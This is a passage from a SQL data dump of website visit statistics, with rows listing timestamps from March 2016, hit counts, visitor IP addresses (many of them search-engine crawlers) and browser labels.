2,0,'66.249.64.228',''),(27059,1459038817,1,1,0,0,'217.69.133.229','other'),(27060,1459038985,1,1,0,0,'217.69.133.68','other'),(27061,1459039081,1,0,1,0,'66.249.64.162',''),(27062,1459039104,4,0,4,0,'68.180.231.29',''),(27063,1459039105,1,1,0,0,'8.29.198.25','other'),(27064,1459039464,1,1,0,0,'217.69.133.234','other'),(27065,1459039591,1,1,0,0,'217.69.133.85','other'),(27066,1459039592,1,1,0,0,'217.69.133.218','other'),(27067,1459039593,1,1,0,0,'217.69.133.215','other'),(27068,1459039682,1,1,0,0,'66.249.89.114','other'),(27069,1459039781,2,0,2,0,'66.249.64.233',''),(27070,1459039891,1,1,0,0,'207.46.13.101','other'),(27071,1459040070,1,0,1,0,'66.249.64.228',''),(27072,1459040551,1,1,0,0,'93.158.152.40','other'),(27073,1459040555,1,1,0,0,'93.158.152.51','other'),(27074,1459040559,1,1,0,0,'130.193.50.6','other'),(27075,1459040562,1,1,0,0,'141.8.132.10','other'),(27076,1459040592,1,1,0,0,'5.255.253.100','other'),(27077,1459040596,1,1,0,0,'130.193.50.34','other'),(27078,1459040599,1,1,0,0,'93.158.152.75','other'),(27079,1459040603,1,1,0,0,'93.158.152.26','other'),(27080,1459040629,1,0,1,0,'66.249.64.223',''),(27081,1459040637,1,0,1,0,'66.249.64.156',''),(27082,1459040759,1,1,0,0,'62.210.215.100','chrome'),(27083,1459041386,1,0,1,0,'66.249.64.228',''),(27084,1459041452,1,0,1,0,'66.249.64.233',''),(27085,1459041708,1,1,0,0,'217.69.133.227','other'),(27086,1459041895,2,1,1,0,'66.249.64.233',''),(27087,1459042002,1,0,1,0,'68.180.231.29',''),(27088,1459042206,1,1,0,0,'217.69.133.244','other'),(27089,1459042207,1,1,0,0,'217.69.133.245','other'),(27090,1459043029,1,1,0,0,'217.69.133.84','other'),(27091,1459043732,1,0,1,0,'66.249.64.228',''),(27092,1459043973,1,1,0,0,'109.163.234.8','chrome'),(27093,1459044011,1,1,0,0,'171.25.193.77','chrome'),(27094,1459044713,1,1,0,0,'217.69.133.194','other'),(27095,1459044917,2,0,2,0,'66.249.64.223',''),(27096,1459045013,2,1,1,0,'66.249.64.233',''),(27097,1459045209,2,0,2,0,'66.249.64.228',''),(27098,1459045371,1,1,0,0,'178.154.189.202','other'),(27099,1459045375,1,1,0,0,'178.154.189.201','other'),(27100,1459045839,1,1,0,0,'66.249.64.223','other'),(27101,1459046192,1,1,0,0,'217.69.133.239','other'),(27102,1459046208,1,1,0,0,'217.69.133.220','other'),(27103,1459046209,1,1,0,0,'217.69.133.224','other'),(27104,1459046261,2,2,0,0,'46.165.197.141','other'),(27105,1459046578,2,1,1,0,'66.249.64.233',''),(27106,1459046707,5,5,0,0,'130.193.50.34','other'),(27107,1459047165,1,1,0,0,'141.8.132.105','other'),(27108,1459047238,1,0,1,0,'68.180.231.29',''),(27109,1459047749,1,1,0,0,'83.234.80.9','firefox'),(27110,1459047937,1,1,0,0,'66.249.64.233','other'),(27111,1459047972,1,1,0,0,'157.55.39.106','other'),(27112,1459047976,2,2,0,0,'157.55.39.31','other'),(27113,1459047981,1,1,0,0,'207.46.13.101','other'),(27114,1459047986,1,1,0,0,'217.69.133.228','other'),(27115,1459048298,1,1,0,0,'217.69.133.221','other'),(27116,1459048385,1,0,1,0,'66.249.64.223',''),(27117,1459048941,2,1,1,0,'66.249.64.233',''),(27118,1459048984,1,1,0,0,'217.69.133.217','other'),(27119,1459048985,1,1,0,0,'217.69.133.84','other'),(27120,1459049164,1,1,0,0,'207.46.13.53','other'),(27121,1459049916,1,1,0,0,'8.29.198.25','other'),(27122,1459050458,1,1,0,0,'66.249.64.228','other'),(27123,1459050703,1,1,0,0,'66.249.64.233','other'),(27124,1459050731,1,1,0,0,'66.249.89.114','other'),(27125,1459050831,1,0,1,0,'66.249.64.162',''),(27126,1459051796,8,1,7,0,'66.249.64.223',''),(27127,1459051949,1,0,1,0,'66.249.64.162',''),(27128,1459052121,2,0,2,0,'66.249.64.233',''),(27129,1459052171,1,1,0,0,'217.69.133.248','other'),(27130,1459052580,1,1,0,0,'217.69.133.223','other'),(27131,1459052702,2,0,2,0,'66.249.64.228',''),(27132,1459053269,1,1,0,0,'217.69.133.30','other'),(27133,1459053270,2,2,0,0,'217.69.133.72','other'),(27134,1459053291,1,1,0,0,'66.249.64.228','other'),(27135,1459053633,1,1,0,0,'130.193.50.34','other'),(27136,1459053928,1,1,0,0,'62.210.215.100','chrome'),(27137,1459054072,1,1,0,0,'217.69.133.215','other'),(27138,1459054073,1,1,0,0,'217.69.133.85','other'),(27139,1459054478,1,1,0,0,'180.76.15.149','other'),(27140,1459054541,1,1,0,0,'180.76.15.15','other'),(27141,1459054584,5,5,0,0,'5.9.62.130','other'),(27142,1459054928,1,1,0,0,'217.69.136.208','other'),(27143,1459055314,1,1,0,0,'217.69.133.233','other'),(27144,1459055763,1,1,0,0,'207.46.13.101','other'),(27145,1459055765,6,0,6,0,'66.249.64.223',''),(27146,1459055832,1,0,1,0,'66.249.64.233',''),(27147,1459056288,1,1,0,0,'217.69.133.30','other'),(27148,1459056389,1,0,1,0,'68.180.231.29',''),(27149,1459056644,1,1,0,0,'217.69.133.222','other'),(27150,1459056689,1,0,1,0,'66.249.64.228',''),(27151,1459056771,1,1,0,0,'66.249.64.228','other'),(27152,1459057351,2,1,1,0,'66.249.64.233',''),(27153,1459057613,1,1,0,0,'178.154.189.203','other'),(27154,1459057811,142,142,0,0,'81.109.65.38','other'),(27155,1459057868,2,2,0,0,'188.40.95.70','other'),(27156,1459057963,2,0,2,0,'66.249.64.223',''),(27157,1459058062,1,0,1,0,'66.249.64.228',''),(27158,1459058375,1,1,0,0,'66.249.64.228','other'),(27159,1459058491,1,1,0,0,'217.69.133.69','other'),(27160,1459058585,2,2,0,0,'217.69.133.220','other'),(27161,1459058678,1,1,0,0,'217.69.133.236','other'),(27162,1459059854,1,0,1,0,'66.249.64.233',''),(27163,1459059969,1,1,0,0,'91.196.178.104','chrome'),(27164,1459060641,1,1,0,0,'94.179.9.44','firefox'),(27165,1459060721,1,1,0,0,'92.113.190.44','chrome'),(27166,1459060745,1,1,0,0,'8.29.198.26','other'),(27167,1459060973,1,0,1,0,'66.249.64.233',''),(27168,1459060992,1,1,0,0,'66.249.89.118','other'),(27169,1459061151,5,5,0,0,'91.194.84.106','other'),(27170,1459061166,1,1,0,0,'217.69.133.237','other'),(27171,1459061536,4,4,0,0,'91.196.178.167','firefox'),(27172,1459062175,2,1,1,0,'66.249.64.233',''),(27173,1459062446,1,1,0,0,'217.69.133.227','other'),(27174,1459062659,1,1,0,0,'217.69.133.12','other'),(27175,1459062858,1,0,1,0,'68.180.231.29',''),(27176,1459063263,1,1,0,0,'66.249.64.233','other'),(27177,1459063330,6,1,5,0,'66.249.64.223',''),(27178,1459063556,1,1,0,0,'207.46.13.101','other'),(27179,1459063577,1,0,1,0,'66.249.64.228',''),(27180,1459064233,1,0,1,0,'66.249.64.156',''),(27181,1459064510,1,1,0,0,'91.221.211.231','chrome'),(27182,1459064545,2,0,2,0,'66.249.64.162',''),(27183,1459064704,1,1,0,0,'95.135.91.243','firefox'),(27184,1459064722,3,0,3,0,'66.249.64.228',''),(27185,1459064919,2,0,2,0,'66.249.64.233',''),(27186,1459065064,2,0,2,0,'66.249.64.223',''),(27187,1459065113,1,1,0,0,'217.69.133.247','other'),(27188,1459065462,1,1,0,0,'217.69.133.240','other'),(27189,1459065746,2,0,2,0,'68.180.231.29',''),(27190,1459065802,1,1,0,0,'95.135.91.243','firefox'),(27191,1459065962,3,0,3,0,'66.249.64.228',''),(27192,1459066129,2,0,2,0,'66.249.64.223',''),(27193,1459066260,1,1,0,0,'217.69.133.216','other'),(27194,1459066296,1,1,0,0,'66.249.93.104','chrome'),(27195,1459066854,1,0,1,0,'66.249.64.233',''),(27196,1459066887,1,0,1,0,'66.249.64.156',''),(27197,1459066899,1,1,0,0,'62.210.215.100','chrome'),(27198,1459066931,1,0,1,0,'66.249.64.228',''),(27199,1459067110,1,1,0,0,'95.135.91.243','firefox'),(27200,1459067123,1,1,0,0,'66.249.64.233','other'),(27201,1459067712,5,0,5,0,'68.180.231.29',''),(27202,1459067990,1,1,0,0,'66.249.64.223','other'),(27203,1459067995,1,1,0,0,'217.69.133.219','other'),(27204,1459067996,1,1,0,0,'217.69.133.85','other'),(27205,1459068000,1,1,0,0,'217.69.133.235','other'),(27206,1459068001,1,1,0,0,'217.69.133.234','other'),(27207,1459068118,2,2,0,0,'37.55.226.220','chrome'),(27208,1459068207,1,0,1,0,'66.249.64.162',''),(27209,1459068400,1,0,1,0,'66.249.64.228',''),(27210,1459068628,3,3,0,0,'95.135.91.243','firefox'),(27211,1459068880,1,0,1,0,'68.180.231.29',''),(27212,1459069107,1,1,0,0,'178.154.189.202','other'),(27213,1459069111,1,1,0,0,'178.154.189.203','other'),(27214,1459069194,2,2,0,0,'130.193.50.34','other'),(27215,1459069375,1,1,0,0,'207.46.13.53','other'),(27216,1459069469,2,2,0,0,'217.69.133.218','other'),(27217,1459069488,1,1,0,0,'217.69.133.85','other'),(27218,1459069592,2,2,0,0,'93.158.152.202','other'),(27219,1459069825,1,1,0,0,'217.69.133.228','other'),(27220,1459069826,1,1,0,0,'217.69.133.233','other'),(27221,1459070322,1,0,1,0,'68.180.231.29',''),(27222,1459070501,1,1,0,0,'207.46.13.101','other'),(27223,1459071324,1,1,0,0,'94.179.23.115','firefox'),(27224,1459071402,1,1,0,0,'66.249.89.114','other'),(27225,1459071638,1,1,0,0,'8.29.198.26','other'),(27226,1459072266,2,0,2,0,'66.249.64.228',''),(27227,1459072282,1,0,1,0,'66.249.64.223',''),(27228,1459072316,1,1,0,0,'180.76.15.11','other'),(27229,1459072454,4,4,0,0,'51.255.48.155','other'),(27230,1459072668,1,1,0,0,'83.143.240.10','firefox'),(27231,1459072810,1,0,1,0,'66.249.64.233',''),(27232,1459073752,3,0,3,0,'66.249.64.233',''),(27233,1459073796,1,0,1,0,'66.249.64.228',''),(27234,1459074219,1,0,1,0,'66.249.64.162',''),(27235,1459074280,2,0,2,0,'66.249.64.223',''),(27236,1459074377,1,0,1,0,'66.249.64.156',''),(27237,1459074991,1,1,0,0,'91.196.178.165','firefox'),(27238,1459075063,1,1,0,0,'91.196.178.167','firefox'),(27239,1459075249,1,0,1,0,'66.249.64.162',''),(27240,1459075328,1,1,0,0,'217.69.133.215','other'),(27241,1459075592,199,199,0,0,'86.132.215.31','other'),(27242,1459075627,1,0,1,0,'66.249.64.233',''),(27243,1459076085,2,0,2,0,'66.249.64.228',''),(27244,1459076565,1,1,0,0,'217.69.133.193','other'),(27245,1459076578,1,0,1,0,'66.249.64.233',''),(27246,1459077255,2,0,2,0,'66.249.78.51',''),(27247,1459077485,1,1,0,0,'217.69.133.84','other'),(27248,1459077861,1,0,1,0,'68.180.231.29',''),(27249,1459078312,1,1,0,0,'217.69.136.210','other'),(27250,1459078323,1,1,0,0,'157.55.39.121','other'),(27251,1459078328,1,1,0,0,'178.92.8.183','other'),(27252,1459079999,1,0,1,0,'68.180.231.29',''),(27253,1459080415,3,3,0,0,'199.58.86.206','other'),(27254,1459080643,1,1,0,0,'217.69.133.228','other'),(27255,1459080657,1,1,0,0,'217.69.133.68','other'),(27256,1459080951,1,1,0,0,'207.46.13.53','other'),(27257,1459081026,1,1,0,0,'95.135.91.243','firefox'),(27258,1459081491,2,0,2,0,'66.249.78.51',''),(27259,1459081961,1,1,0,0,'66.249.92.43','other'),(27260,1459082460,1,1,0,0,'8.29.198.25','other'),(27261,1459082529,1,0,1,0,'66.249.78.58',''),(27262,1459082557,2,2,0,0,'130.193.50.34','other'),(27263,1459082667,1,0,1,0,'66.249.78.113',''),(27264,1459082692,1,1,0,0,'141.8.183.25','other'),(27265,1459083531,1,1,0,0,'94.179.209.193','other'),(27266,1459083549,1,1,0,0,'130.193.50.38','other'),(27267,1459083630,1,1,0,0,'93.158.152.51','other'),(27268,1459083636,2,2,0,0,'93.158.152.75','other'),(27269,1459083644,2,2,0,0,'141.8.142.78','other'),(27270,1459083649,2,2,0,0,'141.8.132.101','other'),(27271,1459083658,1,1,0,0,'141.8.132.83','other'),(27272,1459083663,1,1,0,0,'130.193.51.14','other'),(27273,1459083668,1,1,0,0,'141.8.142.62','other'),(27274,1459083673,1,1,0,0,'141.8.142.85','other'),(27275,1459083682,1,1,0,0,'141.8.142.25','other'),(27276,1459083686,1,1,0,0,'5.255.253.67','other'),(27277,1459083691,1,1,0,0,'5.255.253.68','other'),(27278,1459083696,1,1,0,0,'178.154.149.10','other'),(27279,1459083700,2,2,0,0,'130.193.51.74','other'),(27280,1459083705,1,1,0,0,'130.193.37.7','other'),(27281,1459083856,1,1,0,0,'217.69.133.68','other'),(27282,1459084041,1,1,0,0,'217.69.133.29','other'),(27283,1459084204,1,1,0,0,'178.154.189.31','other'),(27284,1459084209,4,4,0,0,'141.8.183.25','other'),(27285,1459084245,1,0,1,0,'66.249.78.106',''),(27286,1459084370,1,0,1,0,'68.180.231.29',''),(27287,1459084459,1,0,1,0,'66.249.78.113',''),(27288,1459084503,1,0,1,0,'66.249.66.50',''),(27289,1459084627,2,0,2,0,'66.249.78.51',''),(27290,1459084714,2,2,0,0,'130.193.37.7','other'),(27291,1459084718,1,1,0,0,'141.8.142.61','other'),(27292,1459084763,1,1,0,0,'141.8.142.85','other'),(27293,1459084768,1,0,1,0,'66.249.78.58',''),(27294,1459084769,1,1,0,0,'93.158.152.51','other'),(27295,1459084784,9,9,0,0,'141.8.132.105','other'),(27296,1459084788,1,1,0,0,'141.8.142.62','other'),(27297,1459084793,1,1,0,0,'141.8.132.10','other'),(27298,1459084814,15,15,0,0,'130.193.50.34','other'),(27299,1459084819,5,5,0,0,'5.255.253.113','other'),(27300,1459084840,1,1,0,0,'217.69.133.223','other'),(27301,1459085067,1,1,0,0,'95.135.91.243','firefox'),(27302,1459085623,6,6,0,0,'141.8.183.25','other'),(27303,1459085718,2,2,0,0,'141.8.132.105','other'),(27304,1459085727,2,2,0,0,'5.255.253.113','other'),(27305,1459085731,6,6,0,0,'130.193.50.34','other'),(27306,1459085762,1,1,0,0,'151.0.56.122','msie'),(27307,1459086287,1,1,0,0,'167.114.235.72','other'),(27308,1459086542,1,1,0,0,'217.69.133.233','other'),(27309,1459086570,1,0,1,0,'66.249.66.47',''),(27310,1459086579,4,0,4,0,'66.249.78.51',''),(27311,1459086718,1,1,0,0,'217.69.133.224','other'),(27312,1459086738,1,1,0,0,'217.69.133.250','other'),(27313,1459086768,3,3,0,0,'141.8.183.25','other'),(27314,1459086772,9,9,0,0,'141.8.132.105','other'),(27315,1459086809,2,2,0,0,'5.255.253.113','other'),(27316,1459086832,6,6,0,0,'130.193.50.34','other'),(27317,1459087069,1,1,0,0,'217.69.133.221','other'),(27318,1459087383,1,1,0,0,'207.46.13.101','other'),(27319,1459087663,1,0,1,0,'66.249.78.51',''),(27320,1459087999,18,18,0,0,'130.193.50.34','other'),(27321,1459088004,8,8,0,0,'141.8.132.105','other'),(27322,1459088008,11,11,0,0,'141.8.183.25','other'),(27323,1459088013,10,10,0,0,'5.255.253.113','other'),(27324,1459088157,3,3,0,0,'130.193.51.83','other'),(27325,1459089108,1,1,0,0,'217.69.136.208','other'),(27326,1459089404,2,0,2,0,'68.180.231.29',''),(27327,1459090452,2,2,0,0,'141.8.132.105','other'),(27328,1459090616,1,0,1,0,'68.180.231.29',''),(27329,1459090913,2,0,2,0,'66.249.78.58',''),(27330,1459091609,1,1,0,0,'212.113.42.90','firefox'),(27331,1459091671,1,0,1,0,'66.249.78.65',''),(27332,1459091759,10,0,10,0,'66.249.78.51',''),(27333,1459091794,2,0,2,0,'66.249.78.99',''),(27334,1459091853,1,1,0,0,'217.69.133.28','other'),(27335,1459091863,2,0,2,0,'66.249.78.58',''),(27336,1459091953,1,1,0,0,'37.44.76.18','chrome'),(27337,1459091972,1,1,0,0,'207.46.13.115','other'),(27338,1459092039,1,0,1,0,'66.249.66.44',''),(27339,1459092056,1,1,0,0,'180.76.15.19','other'),(27340,1459092349,1,1,0,0,'178.154.189.204','other'),(27341,1459092466,1,1,0,0,'130.193.50.34','other'),(27342,1459092573,1,1,0,0,'66.249.92.46','other'),(27343,1459092823,1,1,0,0,'217.69.133.252','other'),(27344,1459092824,1,1,0,0,'217.69.133.249','other'),(27345,1459093240,1,0,1,0,'66.249.78.58',''),(27346,1459093280,1,1,0,0,'8.29.198.25','other'),(27347,1459093379,1,1,0,0,'141.8.132.105','other'),(27348,1459093544,1,0,1,0,'66.249.66.44',''),(27349,1459093760,1,0,1,0,'66.249.78.65',''),(27350,1459094051,3,3,0,0,'130.193.50.34','other'),(27351,1459094217,7,0,7,0,'66.249.78.51',''),(27352,1459094372,1,1,0,0,'37.9.122.202','other'),(27353,1459094477,19,19,0,0,'141.8.183.25','other'),(27354,1459094484,1,1,0,0,'130.193.51.83','other'),(27355,1459094485,20,20,0,0,'141.8.132.105','other'),(27356,1459094538,7,7,0,0,'5.255.253.113','other'),(27357,1459094820,1,1,0,0,'81.163.126.184','chrome'),(27358,1459094969,1,0,1,0,'66.249.66.50',''),(27359,1459094986,12,12,0,0,'130.193.50.34','other'),(27360,1459095045,1,0,1,0,'66.249.66.44',''),(27361,1459095115,1,1,0,0,'217.69.136.205','other'),(27362,1459095116,1,1,0,0,'217.69.136.208','other'),(27363,1459095340,1,1,0,0,'217.69.133.69','other'),(27364,1459095341,1,1,0,0,'217.69.133.230','other'),(27365,1459095425,2,0,2,0,'66.249.78.65',''),(27366,1459095442,2,1,1,0,'66.249.78.58',''),(27367,1459095514,1,1,0,0,'66.249.93.108','other'),(27368,1459095580,1,1,0,0,'217.69.133.222','other'),(27369,1459095667,1,1,0,0,'217.69.133.60','other'),(27370,1459095669,1,1,0,0,'217.69.133.29','other'),(27371,1459095736,1,1,0,0,'217.69.133.220','other'),(27372,1459096129,1,0,1,0,'66.249.66.44',''),(27373,1459096595,2,0,2,0,'66.249.78.58',''),(27374,1459097150,1,1,0,0,'217.69.133.228','other'),(27375,1459097181,1,1,0,0,'130.193.51.74','other'),(27376,1459097182,1,1,0,0,'130.193.50.4','other'),(27377,1459097183,1,1,0,0,'93.158.152.51','other'),(27379,1459097443,2,0,2,0,'66.249.78.51',''),(27380,1459097496,1,0,1,0,'68.180.231.29',''),(27381,1459097619,2,0,2,0,'66.249.78.65',''),(27382,1459097640,2,2,0,0,'217.69.133.234','other'),(27383,1459097675,1,0,1,0,'66.249.78.58',''),(27384,1459097902,2,2,0,0,'217.69.133.252','other'),(27385,1459097903,1,1,0,0,'217.69.133.249','other'),(27386,1459098035,2,1,1,0,'66.249.78.58',''),(27387,1459098460,1,1,0,0,'66.249.78.51','other'),(27388,1459098587,1,1,0,0,'178.154.189.201','other'),(27389,1459098703,2,2,0,0,'37.9.122.202','other'),(27390,1459098972,1,0,1,0,'66.249.66.44',''),(27391,1459099052,1,0,1,0,'66.249.78.58',''),(27392,1459099357,1,1,0,0,'40.77.167.51','other'),(27393,1459099364,7,0,7,0,'66.249.78.51',''),(27394,1459099424,1,1,0,0,'130.193.37.7','other'),(27395,1459099431,1,1,0,0,'141.8.132.41','other'),(27396,1459099432,2,2,0,0,'130.193.50.4','other'),(27397,1459099636,1,1,0,0,'66.249.66.47','other'),(27398,1459099887,1,1,0,0,'66.249.78.51','other'),(27399,1459100007,1,1,0,0,'66.249.78.58','other'),(27400,1459100392,1,1,0,0,'217.69.133.230','other'),(27401,1459101144,1,1,0,0,'217.69.133.215','other'),(27402,1459101271,3,0,3,0,'66.249.78.58',''),(27403,1459101278,2,0,2,0,'66.249.78.51',''),(27404,1459101497,1,1,0,0,'109.122.40.183','firefox'),(27405,1459101662,2,0,2,0,'66.249.78.65',''),(27406,1459101758,1,0,1,0,'66.249.66.50',''),(27407,1459102066,1,1,0,0,'95.134.168.162','firefox'),(27408,1459102224,1,1,0,0,'217.69.133.85','other'),(27409,1459102225,1,1,0,0,'217.69.133.217','other'),(27410,1459102543,1,1,0,0,'130.193.50.34','other'),(27411,1459102551,1,1,0,0,'141.8.132.105','other'),(27412,1459102605,1,0,1,0,'68.180.231.29',''),(27413,1459102692,1,1,0,0,'217.69.133.227','other'),(27415,1459102730,1,1,0,0,'66.249.78.99','other'),(27416,1459102795,1,0,1,0,'66.249.78.51',''),(27417,1459102905,1,1,0,0,'217.69.133.222','other'),(27418,1459103363,1,1,0,0,'157.55.39.152','other'),(27419,1459103674,1,1,0,0,'207.46.13.22','other'),(27420,1459103732,1,1,0,0,'66.249.92.46','other'),(27421,1459104104,1,1,0,0,'66.249.66.44','other'),(27422,1459104132,1,1,0,0,'8.29.198.26','other'),(27423,1459104205,2,2,0,0,'141.8.143.172','other'),(27424,1459104611,1,0,1,0,'68.180.231.29',''),(27425,1459105221,1,1,0,0,'180.76.15.134','other'),(27426,1459105473,1,0,1,0,'66.249.78.99',''),(27427,1459105525,1,1,0,0,'217.69.133.222','other'),(27428,1459105689,1,1,0,0,'217.69.133.233','other'),(27429,1459106912,1,1,0,0,'217.69.133.68','other'),(27430,1459106913,1,1,0,0,'217.69.133.226','other'),(27431,1459106941,1,1,0,0,'217.69.133.239','other'),(27432,1459106963,1,1,0,0,'141.8.184.22','other'),(27433,1459106964,1,1,0,0,'141.8.183.25','other'),(27434,1459106965,1,1,0,0,'130.193.51.19','other'),(27436,1459107049,1,1,0,0,'217.69.133.228','other'),(27437,1459107314,1,0,1,0,'68.180.231.29',''),(27438,1459107506,1,0,1,0,'66.249.78.51',''),(27439,1459107971,1,1,0,0,'141.8.143.172','other'),(27440,1459108005,4,0,4,0,'66.249.78.58',''),(27441,1459108714,1,0,1,0,'66.249.78.51',''),(27442,1459108764,1,1,0,0,'217.69.133.223','other'),(27443,1459108929,1,1,0,0,'93.158.152.40','other'),(27445,1459109207,1,1,0,0,'157.55.39.31','other'),(27446,1459109607,1,1,0,0,'130.193.51.79','other'),(27447,1459109633,1,1,0,0,'217.69.133.215','other'),(27448,1459109849,1,1,0,0,'217.69.133.220','other'),(27449,1459110053,1,1,0,0,'217.69.133.85','other'),(27450,1459110955,1,1,0,0,'66.249.78.51','other'),(27451,1459110986,1,0,1,0,'68.180.229.103',''),(27452,1459111327,1,1,0,0,'130.193.50.34','other'),(27453,1459111328,2,2,0,0,'141.8.132.105','other'),(27454,1459111523,2,2,0,0,'207.46.13.22','other'),(27455,1459112453,1,1,0,0,'217.69.133.68','other'),(27456,1459112454,1,1,0,0,'217.69.133.220','other'),(27457,1459112828,1,1,0,0,'217.69.133.232','other'),(27458,1459114161,1,1,0,0,'217.69.133.68','other'),(27459,1459114195,1,1,0,0,'37.115.195.161','chrome'),(27460,1459114696,1,1,0,0,'66.249.92.46','other'),(27461,1459114965,1,1,0,0,'8.29.198.26','other'),(27462,1459115140,4,4,0,0,'62.210.148.246','other'),(27463,1459115683,1,1,0,0,'217.69.133.84','other'),(27464,1459116849,1,1,0,0,'157.55.39.152','other'),(27465,1459117141,1,0,1,0,'68.180.231.29',''),(27466,1459117726,1,1,0,0,'101.226.168.245','chrome'),(27467,1459117952,1,1,0,0,'217.69.133.230','other'),(27468,1459118151,1,1,0,0,'180.76.15.137','other'),(27469,1459118310,2,2,0,0,'130.193.50.34','other'),(27470,1459118311,1,1,0,0,'141.8.132.105','other'),(27471,1459118339,1,1,0,0,'217.69.133.222','other'),(27472,1459118621,1,1,0,0,'217.69.133.70','other'),(27473,1459118865,1,1,0,0,'66.249.78.99','other'),(27474,1459118994,1,1,0,0,'91.196.177.69','chrome'),(27475,1459119096,1,1,0,0,'217.69.133.250','other'),(27476,1459119097,1,1,0,0,'217.69.133.252','other'),(27477,1459119098,1,1,0,0,'217.69.133.249','other'),(27478,1459119251,1,1,0,0,'157.55.39.214','other'),(27479,1459119269,1,1,0,0,'217.69.133.243','other'),(27480,1459120073,1,1,0,0,'66.249.78.51','other'),(27481,1459120371,1,1,0,0,'217.69.133.232','other'),(27482,1459120447,1,1,0,0,'66.249.78.58','other'),(27483,1459121851,1,1,0,0,'66.249.78.58','other'),(27484,1459121875,1,0,1,0,'66.249.66.44',''),(27485,1459122049,1,1,0,0,'217.69.133.238','other'),(27486,1459122284,2,0,2,0,'68.180.231.29',''),(27487,1459122638,1,1,0,0,'217.69.136.209','other'),(27488,1459122639,1,1,0,0,'217.69.136.203','other'),(27489,1459122640,1,1,0,0,'217.69.136.208','other'),(27490,1459122790,1,0,1,0,'66.249.66.77',''),(27491,1459122979,1,1,0,0,'217.69.133.29','other'),(27492,1459122981,1,1,0,0,'217.69.133.59','other'),(27493,1459122982,1,1,0,0,'217.69.133.28','other'),(27494,1459123454,1,1,0,0,'217.69.133.219','other'),(27495,1459123456,1,1,0,0,'217.69.133.84','other'),(27496,1459124209,1,1,0,0,'157.55.39.214','other'),(27497,1459124303,1,0,1,0,'68.180.231.29',''),(27498,1459124384,1,1,0,0,'62.210.215.100','chrome'),(27499,1459124512,1,1,0,0,'217.69.133.190','other'),(27500,1459125141,1,1,0,0,'217.69.133.228','other'),(27501,1459125195,2,2,0,0,'66.249.78.58','other'),(27502,1459125374,1,1,0,0,'217.69.133.69','other'),(27503,1459125382,1,1,0,0,'217.69.133.70','other'),(27504,1459125453,1,1,0,0,'66.249.92.49','other'),(27505,1459125787,1,1,0,0,'8.29.198.26','other'),(27506,1459125821,1,0,1,0,'68.180.231.29',''),(27507,1459125972,1,1,0,0,'217.69.133.18','other'),(27508,1459126842,1,1,0,0,'66.249.78.58','other'),(27509,1459126951,1,0,1,0,'66.249.78.51',''),(27510,1459127065,1,1,0,0,'178.154.189.202','other'),(27511,1459127548,1,1,0,0,'66.249.78.65','other'),(27512,1459127984,1,1,0,0,'217.69.133.229','other'),(27513,1459128383,1,1,0,0,'157.55.39.31','other'),(27514,1459128614,1,0,1,0,'66.249.78.58',''),(27515,1459128850,1,1,0,0,'101.209.64.6','chrome'),(27516,1459128875,1,1,0,0,'217.69.133.218','other'),(27517,1459128934,1,1,0,0,'217.69.133.223','other'),(27518,1459129078,1,1,0,0,'66.249.78.58','other'),(27519,1459129082,1,1,0,0,'66.249.66.74','other'),(27520,1459129409,2,0,2,0,'68.180.231.29',''),(27521,1459129481,1,1,0,0,'217.69.133.227','other'),(27522,1459129482,1,1,0,0,'217.69.133.229','other'),(27523,1459129489,75,75,0,0,'5.9.62.130','other'),(27524,1459129606,1,0,1,0,'66.249.66.47',''),(27525,1459130568,3,0,3,0,'68.180.231.29',''),(27526,1459130697,1,1,0,0,'217.69.133.251','other'),(27527,1459131426,1,1,0,0,'217.69.133.223','other'),(27528,1459131671,1,1,0,0,'217.69.133.237','other'),(27529,1459132468,1,0,1,0,'68.180.231.29',''),(27530,1459132485,1,1,0,0,'217.69.133.85','other'),(27531,1459132864,1,1,0,0,'217.69.133.223','other'),(27532,1459132865,2,2,0,0,'217.69.133.221','other'),(27533,1459133506,1,1,0,0,'217.69.133.220','other'),(27534,1459134900,115,115,0,0,'92.156.250.254','other'),(27535,1459134992,1,1,0,0,'207.46.13.127','other'),(27536,1459135427,1,1,0,0,'66.249.78.113','other'),(27537,1459136160,1,1,0,0,'217.69.133.229','other'),(27538,1459136222,1,1,0,0,'217.69.136.208','other'),(27539,1459136342,1,1,0,0,'66.249.92.49','other'),(27540,1459136462,1,0,1,0,'68.180.231.29',''),(27541,1459136598,1,1,0,0,'217.69.133.191','other'),(27542,1459136600,1,1,0,0,'217.69.133.249','other'),(27543,1459136622,1,1,0,0,'8.29.198.26','other'),(27544,1459136968,1,1,0,0,'66.249.78.65','other'),(27545,1459137016,1,1,0,0,'217.69.133.225','other'),(27546,1459137212,2,2,0,0,'217.69.133.59','other'),(27547,1459137700,9,9,0,0,'207.46.13.127','other'),(27548,1459137961,1,1,0,0,'217.69.133.5','other'),(27549,1459138056,1,1,0,0,'66.249.78.65','other'),(27550,1459138348,6,6,0,0,'157.55.39.152','other'),(27551,1459138354,9,9,0,0,'157.55.39.31','other'),(27552,1459138362,11,11,0,0,'157.55.39.214','other'),(27553,1459139412,1,1,0,0,'217.69.133.231','other'),(27554,1459139659,3,3,0,0,'66.249.78.58','other'),(27555,1459139713,1,0,1,0,'68.180.231.29',''),(27556,1459140060,1,1,0,0,'178.92.8.25','chrome'),(27557,1459140435,1,1,0,0,'66.249.78.65','other'),(27558,1459140585,1,1,0,0,'217.69.133.225','other'),(27559,1459140641,1,1,0,0,'83.234.80.9','firefox'),(27560,1459140751,1,1,0,0,'217.69.133.216','other'),(27561,1459141130,1,1,0,0,'180.76.15.19','other'),(27562,1459141277,3,3,0,0,'66.249.78.51','other'),(27563,1459141381,1,1,0,0,'217.69.133.230','other'),(27564,1459141382,2,2,0,0,'217.69.133.229','other'),(27565,1459141729,1,1,0,0,'217.69.133.237','other'),(27566,1459141848,1,1,0,0,'91.196.178.72','chrome'),(27567,1459142108,1,1,0,0,'207.46.13.127','other'),(27568,1459142201,1,1,0,0,'66.249.66.50','other'),(27569,1459142457,1,1,0,0,'91.196.178.67','firefox'),(27570,1459142554,2,2,0,0,'66.249.78.65','other'),(27571,1459142688,1,1,0,0,'66.249.78.51','other'),(27572,1459142748,3,3,0,0,'66.249.78.58','other'),(27573,1459142929,1,1,0,0,'217.69.133.5','other'),(27574,1459143090,2,2,0,0,'91.196.178.66','firefox'),(27575,1459143476,1,1,0,0,'81.163.126.184','chrome'),(27576,1459143500,1,1,0,0,'157.55.39.31','other'),(27577,1459143648,2,2,0,0,'91.196.178.67','firefox'),(27578,1459143689,1,1,0,0,'91.196.178.70','firefox'),(27579,1459144044,1,1,0,0,'217.69.133.219','other'),(27580,1459144122,1,1,0,0,'91.196.178.134','firefox'),(27581,1459144309,1